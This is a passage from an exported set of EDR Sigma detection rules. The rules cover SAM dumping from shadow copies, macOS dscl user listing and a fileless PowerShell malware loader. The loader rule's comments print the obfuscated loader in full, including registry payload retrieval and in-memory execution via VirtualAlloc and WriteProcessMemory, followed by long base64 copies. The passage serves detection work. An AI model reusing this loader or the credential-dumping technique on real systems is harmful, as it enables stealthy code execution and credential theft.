"content": "title: SAM Dumped from a Volume Shadow Copy via PowerShell File::Copy\nid: 716e6c14-f88a-4b70-a62b-aa332b631bab\ndescription: |\n Detects the usage of a PowerShell script accessing the SAM (Security Account Manager) hive via a Volume Shadow Copy by using .NET's File::Copy API to copy the SAM database.\n After parsing it, an attacker could gain access to local account hashes.\n It is recommended to determine if this PowerShell script has a legitimate reason to do so, which is unlikely.\nreferences:\n - https://attack.mitre.org/techniques/T1003/002/\n - https://attack.mitre.org/techniques/T1059/001/\ndate: 2021/12/13\nmodified: 2025/02/19\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1003.002\n - attack.t1059.001\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection:\n PowershellCommand|contains|all:\n - '[System.IO.File]::Copy'\n - '\\\\\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy'\n - 'Windows\\System32\\config\\SAM'\n condition: selection\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "716e6c14-f88a-4b70-a62b-aa332b631bab",
"rule_name": "SAM Dumped from a Volume Shadow Copy via PowerShell File::Copy",
"rule_description": "Detects the usage of a PowerShell script accessing the SAM (Security Account Manager) hive via a Volume Shadow Copy by using .NET's File::Copy API to copy the SAM database.\nAfter parsing it, an attacker could gain access to local account hashes.\nIt is recommended to determine if this PowerShell script has a legitimate reason to do so, which is unlikely.\n",
"rule_creation_date": "2021-12-13",
"rule_modified_date": "2025-02-19",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1003.002",
"attack.t1059.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "719d9b93-0d7f-432a-9548-c653974e8c18",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:35.295139Z",
"creation_date": "2026-03-23T11:45:35.295142Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.295149Z",
"rule_level": "low",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1087/001/"
],
"name": "t1087_001_dscl_users_macos.yml",
"content": "title: Users Listed via Dscl\nid: 719d9b93-0d7f-432a-9548-c653974e8c18\ndescription: |\n Detects the execution of the dscl command to list all users.\n Attackers may use it during the discovery phase of an attack to retrieve the list of existing users.\n It is recommended to check for malicious behavior by the process launching dscl.\nreferences:\n - https://attack.mitre.org/techniques/T1087/001/\ndate: 2022/12/01\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1087.001\n - attack.t1033\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.LOLBin.Dscl\n - classification.macOS.Behavior.Discovery\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection_base:\n # dscl . -list users\n # dscl . -list /Users\n # dscl . -list /Users/../Users\n # dscl . search /Users \"UserShell\" \"/bin/zsh\"\n Image: '/usr/bin/dscl'\n CommandLine|contains:\n - 'list '\n - 'search '\n ParentImage|contains: '?'\n\n selection_users:\n CommandLine|contains: 'users'\n\n exclusion_jamf:\n - ProcessAncestors|contains: '/usr/local/jamf/bin/jamf'\n - ProcessParentCommandLine|contains: '/Library/Application Support/JAMF/tmp/'\n\n exclusion_airwatch:\n ParentImage: '/Library/Application Support/AirWatch/hubd'\n\n exclusion_filewave:\n - Ancestors|contains: '|/usr/local/sbin/FileWave.app/Contents/MacOS/fwcld|'\n - GrandparentCommandLine: '/bin/bash /private/var/FileWave/custom_field_script.sh'\n\n exclusion_munki:\n - GrandparentImage: '/Library/MunkiReport/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python'\n - ParentCommandLine|contains: '/usr/local/munkireport/scripts/'\n\n exclusion_landesk:\n GrandparentImage:\n - '/Library/Application Support/LANDesk/bin/ldiscan'\n - '/Library/Application Support/LANDesk/bin/ldapm'\n\n exclusion_ardagent:\n ProcessParentCommandLine|contains: '/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart'\n\n exclusion_fsecure:\n ParentCommandLine|endswith: '/usr/local/f-secure/bin/uninstall_MacProtection'\n\n exclusion_haxm:\n GrandparentImage: '/usr/local/haxm/haxm-launcher'\n\n exclusion_manageengine:\n GrandparentImage: '/Library/ManageEngine/UEMS_Agent/bin/dcinventory'\n\n exclusion_meraki:\n Ancestors|contains: '|/Library/Application Support/Meraki/m_agent|'\n\n exclusion_mosyle:\n Ancestors|contains: '|/Library/Application Support/Mosyle/MosyleMDM.app/Contents/MacOS/MosyleMDM|'\n\n exclusion_ninjarmm:\n ParentImage: '/Applications/NinjaRMMAgent/programfiles/ninjarmm-macagent'\n\n exclusion_parallels:\n Ancestors|contains: '/Applications/Parallels Desktop.app/Contents/MacOS/prl_client_app'\n\n exclusion_intune:\n Ancestors|contains: '|/Library/Intune/Microsoft Intune Agent.app/Contents/MacOS/IntuneMdmDaemon|'\n\n exclusion_packagekit:\n Ancestors|contains: '|/System/Library/PrivateFrameworks/PackageKit.framework/Versions/A/XPCServices/package_script_service.xpc/Contents/MacOS/package_script_service|'\n\n exclusion_wazuh:\n Ancestors|contains: '/Library/Ossec/bin/wazuh-modulesd|'\n\n exclusion_installer:\n ProcessGrandparentCommandLine|startswith:\n - '/bin/sh /tmp/PKInstallSandbox.??????/'\n - '/bin/bash /tmp/pkinstallsandbox.??????/'\n\n condition: selection_base and selection_users and not 1 of exclusion_*\nlevel: low\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "719d9b93-0d7f-432a-9548-c653974e8c18",
"rule_name": "Users Listed via Dscl",
"rule_description": "Detects the execution of the dscl command to list all users.\nAttackers may use it during the discovery phase of an attack to retrieve the list of existing users.\nIt is recommended to check for malicious behavior by the process launching dscl.\n",
"rule_creation_date": "2022-12-01",
"rule_modified_date": "2026-02-11",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1033",
"attack.t1087.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "71c03cb7-362d-4076-95e6-72f3834cdd23",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.085108Z",
"creation_date": "2026-03-23T11:45:34.085111Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.085115Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/FuzzySecurity/HackSysTeam-PSKernelPwn"
],
"name": "t1059_001_unknown_malicious_powershell.yml",
"content": "title: Generic Malicious PowerShell Payload Detected\nid: 71c03cb7-362d-4076-95e6-72f3834cdd23\ndescription: |\n Detects suspicious PowerShell command-line arguments used by an unknown fileless malware that reads an additional payload from the registry.\n Adversaries may use encoded PowerShell cmdlets to deploy staged payloads.\n It is recommended to check for malicious actions by child and parent processes of PowerShell and to look for other suspicious activities on the host.\nreferences:\n - https://github.com/FuzzySecurity/HackSysTeam-PSKernelPwn\ndate: 2021/12/20\nmodified: 2025/04/11\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059.001\n - attack.t1106\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Script.PowerShell\n - classification.Windows.Malware.Generic\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_powershell:\n - Image|endswith: '\\powershell.exe'\n - OriginalFileName: 'PowerShell.EXE'\n\n selection_loader_1:\n # $VaCs3fdEn = \"HKLM:\\Software\\Microsoft\\Windows\\CurrentVersion\\Shell\";$A89Qc27sM0 = \"{009C12BA-9447-54BC-EA2080AE57C8148B}\";function LH3YNl12m{Param([OutputType([Type])][Parameter( Position = 0)][Type[]]$oCUkRh1v8 = (New-Object Type[](0)),[Parameter( Position = 1 )][Type]$DrFWIrAyX = [Void])$HZsTHC = [AppDomain]::CurrentDomain;$T1opS9Lis7 = New-Object System.Reflection.AssemblyName('ReflectedDelegate');$ryR9tOl = $HZsTHC.DefineDynamicAssembly($T1opS9Lis7, [System.Reflection.Emit.AssemblyBuilderAccess]::Run);$JAROetsrFZ = $ryR9tOl.DefineDynamicModule('InMemoryModule', $false);$ZNXMFeI = $JAROetsrFZ.DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate]);$Dishyv6phR = $ZNXMFeI.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $oCUkRh1v8);$Dishyv6phR.SetImplementationFlags('Runtime, Managed');$sVRpoyL = $ZNXMFeI.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $DrFWIrAyX, $oCUkRh1v8);$sVRpoyL.SetImplementationFlags('Runtime, Managed');Write-Output $ZNXMFeI.CreateType();}function g2WlK($HS1ZO, $tiiuai) {$IbsFQ6 = $HS1ZO[$tiiuai+0] * 16777216;$IbsFQ6 += $HS1ZO[$tiiuai+1] * 65536;$IbsFQ6 += $HS1ZO[$tiiuai+2] * 256;$IbsFQ6 += $HS1ZO[$tiiuai+3] * 1;return $IbsFQ6;}$LrV8DtVv = \"{0}IntPtr GetCurrentProcess();{0}IntPtr VirtualAlloc(IntPtr addr, uint size, uint type, uint prot);{0}bool WriteProcessMemory(IntPtr proc, IntPtr addr, byte[] buf, uint size, uint written);{0}uint SetErrorMode(uint mode);\" -f \"[DllImport(`\"kernel32.dll`\")]public static extern \";$yz7b7 = Add-Type -memberDefinition $LrV8DtVv -Name \"Win32\" -namespace Win32Functions -passthru;if (!$yz7b7) {Stop-Process -Force $PID;}function zvawmO952($LrV8DtVv, $LE9SaaFu7u, $LEsgFYY1Md) {$AM5Fw0fCuS = $yz7b7::GetCurrentProcess();$MHUHV = $yz7b7::VirtualAlloc(0,$LrV8DtVv.Length,0x00003000,0x40);$OMdlGR = $yz7b7::VirtualAlloc(0,$LEsgFYY1Md.Length,0x00003000,0x40);$yz7b7::WriteProcessMemory($AM5Fw0fCuS, $MHUHV, $LrV8DtVv, $LrV8DtVv.Length, 0) | Out-Null;$yz7b7::WriteProcessMemory($AM5Fw0fCuS, $OMdlGR, $LEsgFYY1Md, $LEsgFYY1Md.Length, 0) | Out-Null;$waEmkZRWoF = [IntPtr]($MHUHV.ToInt64()+$LE9SaaFu7u);$CiTgve = LH3YNl12m @([IntPtr], [IntPtr]) ([Void]);$qzYRF = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($waEmkZRWoF, $CiTgve);$yz7b7::SetErrorMode(0x8006) | Out-Null;$qzYRF.Invoke($OMdlGR, $MHUHV);}function W3F6u($sGkh0Zb6n, $PjFjESeo) {$UW2UgVXH = g2WlK $sGkh0Zb6n 1;$bolOl = 5;while ($bolOl+8 -lt $UW2UgVXH) {$sYG3eEIY5R = $sGkh0Zb6n[$bolOl];$QHLEHOG = g2WlK $sGkh0Zb6n ($bolOl+1);$xBpbyxhk0 = g2WlK $sGkh0Zb6n ($bolOl+5);$bolOl += 9;if ($sYG3eEIY5R -eq $PjFjESeo) {zvawmO952 $sGkh0Zb6n[$bolOl..($bolOl+$QHLEHOG)] $xBpbyxhk0 $sGkh0Zb6n;break;} else {$bolOl += $QHLEHOG;}}}$MIJKw26g = (Get-ItemProperty -Path \"$VaCs3fdEn\" -Name \"$A89Qc27sM0\" -ErrorAction SilentlyContinue).$A89Qc27sM0;if (!$MIJKw26g) {$MIJKw26g = \"\";for ($bolOl=0; $XF4voR=(Get-ItemProperty -Path \"$VaCs3fdEn\" -Name \"$A89Qc27sM0-$bolOl\" -ErrorAction SilentlyContinue).\"$A89Qc27sM0-$bolOl\"; $bolOl++) {$MIJKw26g += $XF4voR.Trim();}}$sGkh0Zb6n = [System.Convert]::FromBase64String($MIJKw26g);$sGkh0Zb6n[0] = 0;if ([IntPtr]::Size -eq 8) {W3F6u $sGkh0Zb6n 2;} else {W3F6u $sGkh0Zb6n 1;}Stop-Process -Force $PID;\n CommandLine|contains:\n # New-Object System.Reflection.AssemblyName('ReflectedDelegate');\n - 'TgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4AUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACgAJwBSAGUAZgBsAGUAYwB0AGUAZABEAGUAbABlAGcAYQB0AGUAJwApADsA'\n - '4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAoACcAUgBlAGYAbABlAGMAdABlAGQARABlAGwAZQBnAGEAdABlACcAKQA7A'\n - 'OAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AE4AYQBtAGUAKAAnAFIAZQBmAGwAZQBjAHQAZQBkAEQAZQBsAGUAZwBhAHQAZQAnACkAOw'\n\n selection_loader_2:\n CommandLine|contains:\n # .DefineDynamicModule('InMemoryModule',\n - 'LgBEAGUAZgBpAG4AZQBEAHkAbgBhAG0AaQBjAE0AbwBkAHUAbABlACgAJwBJAG4ATQBlAG0AbwByAHkATQBvAGQAdQBsAGUAJwAsACAA'\n - '4ARABlAGYAaQBuAGUARAB5AG4AYQBtAGkAYwBNAG8AZAB1AGwAZQAoACcASQBuAE0AZQBtAG8AcgB5AE0AbwBkAHUAbABlACcALAAgA'\n - 'uAEQAZQBmAGkAbgBlAEQAeQBuAGEAbQBpAGMATQBvAGQAdQBsAGUAKAAnAEkAbgBNAGUAbQBvAHIAeQBNAG8AZAB1AGwAZQAnACwAIA'\n\n selection_loader_3:\n CommandLine|contains:\n # {0}IntPtr GetCurrentProcess();{0}IntPtr VirtualAlloc(IntPtr addr, uint size, uint type, uint prot);{0}bool WriteProcessMemory(IntPtr proc, IntPtr addr, byte[] buf, uint size, uint written);{0}uint SetErrorMode(uint mode);\n - 'ewAwAH0ASQBuAHQAUAB0AHIAIABHAGUAdABDAHUAcgByAGUAbgB0AFAAcgBvAGMAZQBzAHMAKAApADsAewAwAH0ASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAYQBkAGQAcgAsACAAdQBpAG4AdAAgAHMAaQB6AGUALAAgAHUAaQBuAHQAIAB0AHkAcABlACwAIAB1AGkAbgB0ACAAcAByAG8AdAApADsAewAwAH0AYgBvAG8AbAAgAFcAcgBpAHQAZQBQAHIAbwBjAGUAcwBzAE0AZQBtAG8AcgB5ACgASQBuAHQAUAB0AHIAIABwAHIAbwBjACwAIABJAG4AdABQAHQAcgAgAGEAZABkAHIALAAgAGIAeQB0AGUAWwBdACAAYgB1AGYALAAgAHUAaQBuAHQAIABzAGkAegBlACwAIAB1AGkAbgB0ACAAdwByAGkAdAB0AGUAbgApADsAewAwAH0AdQBpAG4AdAAgAFMAZQB0AEUAcgByAG8AcgBNAG8AZABlACgAdQBpAG4AdAAgAG0AbwBkAGUAKQA7A'\n - 'sAMAB9AEkAbgB0AFAAdAByACAARwBlAHQAQwB1AHIAcgBlAG4AdABQAHIAbwBjAGUAcwBzACgAKQA7AHsAMAB9AEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKABJAG4AdABQAHQAcgAgAGEAZABkAHIALAAgAHUAaQBuAHQAIABzAGkAegBlACwAIAB1AGkAbgB0ACAAdAB5AHAAZQAsACAAdQBpAG4AdAAgAHAAcgBvAHQAKQA7AHsAMAB9AGIAbwBvAGwAIABXAHIAaQB0AGUAUAByAG8AYwBlAHMAcwBNAGUAbQBvAHIAeQAoAEkAbgB0AFAAdAByACAAcAByAG8AYwAsACAASQBuAHQAUAB0AHIAIABhAGQAZAByACwAIABiAHkAdABlAFsAXQAgAGIAdQBmACwAIAB1AGkAbgB0ACAAcwBpAHoAZQAsACAAdQBpAG4AdAAgAHcAcgBpAHQAdABlAG4AKQA7AHsAMAB9AHUAaQBuAHQAIABTAGUAdABFAHIAcgBvAHIATQBvAGQAZQAoAHUAaQBuAHQAIABtAG8AZABlACkAOw'\n - '7ADAAfQBJAG4AdABQAHQAcgAgAEcAZQB0AEMAdQByAHIAZQBuAHQAUAByAG8AYwBlAHMAcwAoACkAOwB7ADAAfQBJAG4AdABQAHQAcgAgAFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgASQBuAHQAUAB0AHIAIABhAGQAZAByACwAIAB1AGkAbgB0ACAAcwBpAHoAZQAsACAAdQBpAG4AdAAgAHQAeQBwAGUALAAgAHUAaQBuAHQAIABwAHIAbwB0ACkAOwB7ADAAfQBiAG8AbwBsACAAVwByAGkAdABlAFAAcgBvAGMAZQBzAHMATQBlAG0AbwByAHkAKABJAG4AdABQAHQAcgAgAHAAcgBvAGMALAAgAEkAbgB0AFAAdAByACAAYQBkAGQAcgAsACAAYgB5AHQAZQBbAF0AIABiAHUAZgAsACAAdQBpAG4AdAAgAHMAaQB6AGUALAAgAHUAaQBuAHQAIAB3AHIAaQB0AHQAZQBuACkAOwB7ADAAfQB1AGkAbgB0ACAAUwBlAHQARQByAHIAbwByAE0AbwBkAGUAKAB1AGkAbgB0ACAAbQBvAGQAZQApADsA'\n\n selection_child_1:\n # $dANHP8T = \"\\Microsoft\\Windows\\Diagnosis\\8328329d-db4e-5fe3-d9d7cf43b3599e76\";$c85X2z = 1;$cAQNi = \"JABaAGgAUwBrAHgAVwAgAD0AIAAiAEgASwBMAE0AOgBcAFMAbwBmAHQAdwBhAHIAZQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAFMAaABlAGwAbAAiADsAJABFAEcASABSAFgAZQBsADIAIAA9ACAAIgB7AEEAMQA3ADIANwAyADUAQwAtADAARgA2AEIALQA1AEIAQwAzAC0AOABBADEARAA5ADUANQA3ADMAOAAyADYAMwAwADIANQB9ACIAOwBmAHUAbgBjAHQAaQBvAG4AIABjAE4ARQBTAFEAaQB7AFAAYQByAGEAbQAoAFsATwB1AHQAcAB1AHQAVAB5AHAAZQAoAFsAVAB5AHAAZQBdACkAXQBbAFAAYQByAGEAbQBlAHQAZQByACgAIABQAG8AcwBpAHQAaQBvAG4AIAA9ACAAMAApAF0AWwBUAHkAcABlAFsAXQBdACQASABmADUAOQBHAGcAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAVAB5AHAAZQBbAF0AKAAwACkAKQAsAFsAUABhAHIAYQBtAGUAdABlAHIAKAAgAFAAbwBzAGkAdABpAG8AbgAgAD0AIAAxACAAKQBdAFsAVAB5AHAAZQBdACQAdABRADkARQBkACAAPQAgAFsAVgBvAGkAZABdACkAJABNAGgAdABXAGIAZwBkAHQAIAA9ACAAWwBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuADsAJABwADAAYgBKAFcARwAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AE4AYQBtAGUAKAAnAFIAZQBmAGwAZQBjAHQAZQBkAEQAZQBsAGUAZwBhAHQAZQAnACkAOwAkAFAAagBqAHMASwBhAFUARABlACAAPQAgACQATQBoAHQAVwBiAGcAZAB0AC4ARABlAGYAaQBuAGUARAB5AG4AYQBtAGkAYwBBAHMAcwBlAG0AYgBsAHkAKAAkAHAAMABiAEoAVwBHACwAIABbAFMAeQBzAHQAZQBtAC4AUgBlAGYAbABlAGMAdABpAG8AbgAuAEUAbQBpAHQALgBBAHMAcwBlAG0AYgBsAHkAQgB1AGkAbABkAGUAcgBBAGMAYwBlAHMAcwBdADoAOgBSAHUAbgApADsAJABnAGwAMwBZAHoASABjAHUAcQBJACAAPQAgACQAUABqAGoAcwBLAGEAVQBEAGUALgBEAGUAZgBpAG4AZQBEAHkAbgBhAG0AaQBjAE0AbwBkAHUAbABlACgAJwBJAG4ATQBlAG0AbwByAHkATQBvAGQAdQBsAGUAJwAsACAAJABmAGEAbABzAGUAKQA7ACQAUwB4ADQAMwBWAEIAWABtACAAPQAgACQAZwBsADMAWQB6AEgAYwB1AHEASQAuAEQAZQBmAGkAbgBlAFQAeQBwAGUAKAAnAE0AeQBEAGUAbABlAGcAYQB0AGUAVAB5AHAAZQAnACwAIAAnAEMAbABhAHMAcwAsACAAUAB1AGIAbABpAGMALAAgAFMAZQBhAGwAZQBkACwAIABBAG4AcwBpAEMAbABhAHMAcwAsACAAQQB1AHQAbwBDAGwAYQBzAHMAJwAsACAAWwBTAHkAcwB0AGUAbQAuAE0AdQBsAHQAaQBjAGEAcwB0AEQAZQBsAGUAZwBhAHQAZQBdACkAOwAkAGgAWQAzAEUAdgB1ACAAPQAgACQAUwB4ADQAMwBWAEIAWABtAC4ARABlAGYAaQBuAGUAQwBvAG4AcwB0AHIAdQBjAHQAbwByACgAJwBSAFQAUwBwAGUAYwBpAGEAbABOAGEAbQBlACwAIABIAGkAZABlAEIAeQBTAGkAZwAsACAAUAB1AGIAbABpAGMAJwAsACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBDAGEAbABsAGkAbgBnAEMAbwBuAHYAZQBuAHQAaQBvAG4AcwBdADoAOgBTAHQAYQBuAGQAYQByAGQALAAgACQASABmADUAOQBHAGcAKQA7ACQAaABZADMARQB2AHUALgBTAGUAdABJAG0AcABsAGUAbQBlAG4AdABhAHQAaQBvAG4ARgBsAGEAZwBzACgAJwBSAHUAbgB0AGkAbQBlACwAIABNAGEAbgBhAGcAZQBkACcAKQA7ACQAegBNAGkAQgBPAHAAQwB4ACAAPQAgACQAUwB4ADQAMwBWAEIAWABtAC4ARABlAGYAaQBuAGUATQBlAHQAaABvAGQAKAAnAEkAbgB2AG8AawBlACcALAAgACcAUAB1AGIAbABpAGMALAAgAEgAaQBkAGUAQgB5AFMAaQBnACwAIABOAGUAdwBTAGwAbwB0ACwAIABWAGkAcgB0AHUAYQBsACcALAAgACQAdABRADkARQBkACwAIAAkAEgAZgA1ADkARwBnACkAOwAkAHoATQBpAEIATwBwAEMAeAAuAFMAZQB0AEkAbQBwAGwAZQBtAGUAbgB0AGEAdABpAG8AbgBGAGwAYQBnAHMAKAAnAFIAdQBuAHQAaQBtAGUALAAgAE0AYQBuAGEAZwBlAGQAJwApADsAVwByAGkAdABlAC0ATwB1AHQAcAB1AHQAIAAkAFMAeAA0ADMAVgBCAFgAbQAuAEMAcgBlAGEAdABlAFQAeQBwAGUAKAApADsAfQBmAHUAbgBjAHQAaQBvAG4AIABOAFUAQQBsAEcAQwBYAHAAZwAoACQAeQBRAEwAcQA0AGwAawBRACwAIAAkAGUAMgBIAGoAYQApACAAewAkAGIARABKAEMAMgBIAHEAWQAgACAAPQAgACQAeQBRAEwAcQA0AGwAawBRAFsAJABlADIASABqAGEAKwAwAF0AIAAqACAAMQA2ADcANwA3ADIAMQA2ADsAJABiAEQASgBDADIASABxAFkAIAArAD0AIAAkAHkAUQBMAHEANABsAGsAUQBbACQAZQAyAEgAagBhACsAMQBdACAAKgAgADYANQA1ADMANgA7ACQAYgBEAEoAQwAyAEgAcQBZACAAKwA9ACAAJAB5AFEATABxADQAbABrAFEAWwAkAGUAMgBIAGoAYQArADIAXQAgACoAIAAyADUANgA7ACQAYgBEAEoAQwAyAEgAcQBZACAAKwA9ACAAJAB5AFEATABxADQAbABrAFEAWwAkAGUAMgBIAGoAYQArADMAXQAgACoAIAAxADsAcgBlAHQAdQByAG4AIAAkAGIARABKAEMAMgBIAHEAWQA7AH0AJABMAE0ARgB6AEIAaABwAGwAYQBlACAAPQAgACIAewAwAH0ASQBuAHQAUAB0AHIAIABHAGUAdABDAHUAcgByAGUAbgB0AFAAcgBvAGMAZQBzAHMAKAApADsAewAwAH0ASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAYQBkAGQAcgAsACAAdQBpAG4AdAAgAHMAaQB6AGUALAAgAHUAaQBuAHQAIAB0AHkAcABlACwAIAB1AGkAbgB0ACAAcAByAG8AdAApADsAewAwAH0AYgBvAG8AbAAgAFcAcgBpAHQAZQBQAHIAbwBjAGUAcwBzAE0AZQBtAG8AcgB5ACgASQBuAHQAUAB0AHIAIABwAHIAbwBjACwAIABJAG4AdABQAHQAcgAgAGEAZABkAHIALAAgAGIAeQB0AGUAWwBdACAAYgB1AGYALAAgAHUAaQBuAHQAIABzAGkAegBlACwAIAB1AGkAbgB0ACAAdwByAGkAdAB0AGUAbgApADsAewAwAH0AdQBpAG4AdAAgAFMAZQB0AEUAcgByAG8AcgBNAG8AZABlACgAdQBpAG4AdAAgAG0AbwBkAGUAKQA7ACIAIAAtAGYAIAAiAFsARABsAGwASQBtAHAAbwByAHQAKABgACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAYAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIAAiADsAJABkAE0ASwBVAGIATgAgAD0AIABBAGQAZAAtAFQAeQBwAGUAIAAtAG0AZQBtAGIAZQByAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAEwATQBGAHoAQgBoAHAAbABhAGUAIAAtAE4AYQBtAGUAIAAiAFcAaQBuADMAMgAiACAALQBuAGEAbQBlAHMAcABhAGMAZQAgAFcAaQBuADMAMgBGAHUAbgBjAHQAaQBvAG4AcwAgAC0AcABhAHMAcwB0AGgAcgB1ADsAaQBmACAAKAAhACQAZABNAEsAVQBiAE4AKQAgAHsAUwB0AG8AcAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAbwByAGMAZQAgACQAUABJAEQAOwB9AGYAdQBuAGMAdABpAG8AbgAgAEQASwBQAEQATQBLACgAJABMAE0ARgB6AEIAaABwAGwAYQBlACwAIAAkAE0AdgBoAEQANgBUAG4ATwBpAFMALAAgACQAdQBRAFkAMwBUAG4AbQApACAAewAkAEEAWABSADUAWABiAGwAbABVACAAPQAgACQAZABNAEsAVQBiAE4AOgA6AEcAZQB0AEMAdQByAHIAZQBuAHQAUAByAG8AYwBlAHMAcwAoACkAOwAkAG8ANwBkADYARgBuADEANwA5AGEAIAA9ACAAJABkAE0ASwBVAGIATgA6ADoAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKAAwACwAJABMAE0ARgB6AEIAaABwAGwAYQBlAC4ATABlAG4AZwB0AGgALAAwAHgAMAAwADAAMAAzADAAMAAwACwAMAB4ADQAMAApADsAJAB6AHEAbwB0AFcAbwBrACAAPQAgACQAZABNAEsAVQBiAE4AOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsACQAdQBRAFkAMwBUAG4AbQAuAEwAZQBuAGcAdABoACwAMAB4ADAAMAAwADAAMwAwADAAMAAsADAAeAA0ADAAKQA7ACQAZABNAEsAVQBiAE4AOgA6AFcAcgBpAHQAZQBQAHIAbwBjAGUAcwBzAE0AZQBtAG8AcgB5ACgAJABBAFgAUgA1AFgAYgBsAGwAVQAsACAAJABvADcAZAA2AEYAbgAxADcAOQBhACwAIAAkAEwATQBGAHoAQgBoAHAAbABhAGUALAAgACQATABNAEYAegBCAGgAcABsAGEAZQAuAEwAZQBuAGcAdABoACwAIAAwACkAIAB8ACAATwB1AHQALQBOAHUAbABsADsAJABkAE0ASwBVAGIATgA6ADoAVwByAGkAdABlAFAAcgBvAGMAZQBzAHMATQBlAG0AbwByAHkAKAAkAEEAWABSADUAWABiAGwAbABVACwAIAAkAHoAcQBvAHQAVwBvAGsALAAgACQAdQBRAFkAMwBUAG4AbQAsACAAJAB1AFEAWQAzAFQAbgBtAC4ATABlAG4AZwB0AGgALAAgADAAKQAgAHwAIABPAHUAdAAtAE4AdQBsAGwA